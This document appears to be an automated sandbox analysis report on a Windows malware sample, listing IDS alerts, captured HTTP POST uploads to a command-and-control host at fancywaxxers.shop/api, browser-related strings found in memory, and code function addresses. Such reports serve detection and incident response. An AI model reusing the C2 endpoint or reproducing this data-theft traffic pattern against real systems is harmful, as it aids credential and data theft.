            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.112.1:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.112.1:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: fancywaxxers.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=HCZVVRB9YU1BI9MGOFDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18169Host: fancywaxxers.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=T5H7PAQG41KHN8MHY7CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8790Host: fancywaxxers.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7ZJUYBBS9X5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20395Host: fancywaxxers.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6OPMM33SI10YDMKDTMUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1248Host: fancywaxxers.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=N4Y16TNE0FZYKUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 569055Host: fancywaxxers.shop
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: fancywaxxers.shop
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
            Source: x6VtGfW26X.exe, 00000000.00000003.1753167633.00000000059F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: x6VtGfW26X.exe, 00000000.00000003.1753167633.00000000059F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: x6VtGfW26X.exe, 00000000.00000003.1824563850.0000000001240000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1821734147.000000000123E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: x6VtGfW26X.exe, 00000000.00000003.1753167633.00000000059F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: x6VtGfW26X.exe, 00000000.00000003.1753167633.00000000059F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: x6VtGfW26X.exe, 00000000.00000003.1753167633.00000000059F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: x6VtGfW26X.exe, 00000000.00000003.1753167633.00000000059F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: x6VtGfW26X.exe, 00000000.00000003.1753167633.00000000059F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: x6VtGfW26X.exe, 00000000.00000003.1753167633.00000000059F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: x6VtGfW26X.exe, 00000000.00000003.1753167633.00000000059F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: x6VtGfW26X.exe, 00000000.00000003.1753167633.00000000059F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: x6VtGfW26X.exe, 00000000.00000003.1753167633.00000000059F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: x6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: x6VtGfW26X.exe, 00000000.00000003.1754654889.000000000126D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
            Source: x6VtGfW26X.exe, 00000000.00000003.1754654889.000000000126D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
            Source: x6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: x6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: x6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: x6VtGfW26X.exe, 00000000.00000003.1754654889.000000000126D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
            Source: x6VtGfW26X.exe, 00000000.00000003.1754654889.000000000126D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: x6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: x6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: x6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: x6VtGfW26X.exe, 00000000.00000003.1824627069.00000000011E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/
            Source: x6VtGfW26X.exe, 00000000.00000002.1825873108.0000000001262000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000002.1825639717.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1768843277.00000000059A4000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1788479587.000000000125B000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1779525577.0000000001260000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1824748858.00000000059A2000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1752903971.000000000126D000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1754654889.000000000126D000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1779642291.00000000059A4000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1824627069.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1821674325.0000000001262000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1821791859.00000000059A2000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1738797975.00000000059A2000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1754283149.000000000126D000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1738935579.00000000059A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api
            Source: x6VtGfW26X.exe, 00000000.00000003.1754654889.000000000126D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
            Source: x6VtGfW26X.exe, 00000000.00000003.1726707049.0000000005A00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: x6VtGfW26X.exe, 00000000.00000003.1754316169.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: x6VtGfW26X.exe, 00000000.00000003.1754316169.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: x6VtGfW26X.exe, 00000000.00000003.1726707049.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1738963954.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726780789.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1738836510.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1738674715.00000000059F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: x6VtGfW26X.exe, 00000000.00000003.1726780789.00000000059D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: x6VtGfW26X.exe, 00000000.00000003.1726707049.0000000005A00000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1738963954.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726780789.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1738836510.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1738674715.00000000059F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: x6VtGfW26X.exe, 00000000.00000003.1726780789.00000000059D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: x6VtGfW26X.exe, 00000000.00000003.1754654889.000000000126D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
            Source: x6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: x6VtGfW26X.exe, 00000000.00000003.1754654889.000000000126D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: x6VtGfW26X.exe, 00000000.00000003.1726375963.00000000059EA000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1726304754.00000000059ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: x6VtGfW26X.exe, 00000000.00000003.1754316169.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: x6VtGfW26X.exe, 00000000.00000003.1754316169.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: x6VtGfW26X.exe, 00000000.00000003.1754316169.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: x6VtGfW26X.exe, 00000000.00000003.1754316169.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: x6VtGfW26X.exe, 00000000.00000003.1754316169.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.4:49736 version: TLS 1.2

            System Summary

            barindex
            PE file contains section with special chars
            Source: x6VtGfW26X.exeStatic PE information: section name:
            Source: x6VtGfW26X.exeStatic PE information: section name: .idata
            Source: x6VtGfW26X.exeStatic PE information: section name:
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007D60000_2_007D6000
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007E84F00_2_007E84F0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007F04800_2_007F0480
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007B86400_2_007B8640
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007E88600_2_007E8860
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007C8DF10_2_007C8DF1
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007D10600_2_007D1060
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007C93620_2_007C9362
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007B95A00_2_007B95A0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007BD6F80_2_007BD6F8
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007EFB800_2_007EFB80
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007EBCE00_2_007EBCE0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007BDE480_2_007BDE48
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007DBE8A0_2_007DBE8A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0085008A0_2_0085008A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007DA0500_2_007DA050
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008120BB0_2_008120BB
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007E80400_2_007E8040
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0081C0000_2_0081C000
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008D80140_2_008D8014
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008480470_2_00848047
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084004F0_2_0084004F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086C0760_2_0086C076
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084C1800_2_0084C180
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082618B0_2_0082618B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0081818C0_2_0081818C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007B61600_2_007B6160
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008221A20_2_008221A2
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008BC1AA0_2_008BC1AA
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084A1A60_2_0084A1A6
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008901AC0_2_008901AC
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008681AE0_2_008681AE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_00A5C1880_2_00A5C188
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008961A40_2_008961A4
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007C61480_2_007C6148
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089C1B30_2_0089C1B3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084E1C40_2_0084E1C4
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007F01300_2_007F0130
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008941D30_2_008941D3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086C1E30_2_0086C1E3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008B41E60_2_008B41E6
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0083A1F10_2_0083A1F1
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082E1F80_2_0082E1F8
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008BE10A0_2_008BE10A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008641000_2_00864100
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008921030_2_00892103
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008141170_2_00814117
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087A11F0_2_0087A11F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0088E1290_2_0088E129
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0083C1330_2_0083C133
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008CA13E0_2_008CA13E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C61480_2_008C6148
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007EC1B00_2_007EC1B0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089A1700_2_0089A170
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008382800_2_00838280
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007DC26C0_2_007DC26C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008DE2950_2_008DE295
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008AC2A00_2_008AC2A0
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008822A40_2_008822A4
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008622D60_2_008622D6
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008522DD0_2_008522DD
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0081A2E90_2_0081A2E9
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0082A2F70_2_0082A2F7
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089A2120_2_0089A212
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008322230_2_00832223
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008D422C0_2_008D422C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008BA22D0_2_008BA22D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008AA2210_2_008AA221
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008DA23D0_2_008DA23D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008202350_2_00820235
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008E024F0_2_008E024F
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008482460_2_00848246
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0088A24C0_2_0088A24C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008442630_2_00844263
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0098426C0_2_0098426C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007B42800_2_007B4280
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007DC2820_2_007DC282
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007D63600_2_007D6360
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008783AE0_2_008783AE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008763BB0_2_008763BB
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007D63400_2_007D6340
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008403BB0_2_008403BB
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0088C3CE0_2_0088C3CE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C43E70_2_008C43E7
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008363F30_2_008363F3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008D83F10_2_008D83F1
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008803110_2_00880311
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0085C31A0_2_0085C31A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089E32B0_2_0089E32B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0083E32C0_2_0083E32C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007CC3CC0_2_007CC3CC
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008B233A0_2_008B233A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086635B0_2_0086635B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007D238D0_2_007D238D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008463720_2_00846372
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008CE3700_2_008CE370
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007D847D0_2_007D847D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0085C49E0_2_0085C49E
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008B84AF0_2_008B84AF
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008A44A10_2_008A44A1
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008984C30_2_008984C3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008504CE0_2_008504CE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087A4C80_2_0087A4C8
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C24DE0_2_008C24DE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008AC4060_2_008AC406
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0086A4170_2_0086A417
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008344470_2_00834447
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0085A44C0_2_0085A44C
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0081845A0_2_0081845A
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087E4610_2_0087E461
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0084E4720_2_0084E472
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008A259B0_2_008A259B
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008C65990_2_008C6599
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007E65540_2_007E6554
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008125B30_2_008125B3
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0087C5C60_2_0087C5C6
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_0089C5C80_2_0089C5C8
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008305C10_2_008305C1
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008325D40_2_008325D4
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008345D40_2_008345D4
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_008545D80_2_008545D8
            Source: C:\Users\user\Desktop\x6VtGfW26X.exeCode function: 0_2_007EC5100_2_007EC510
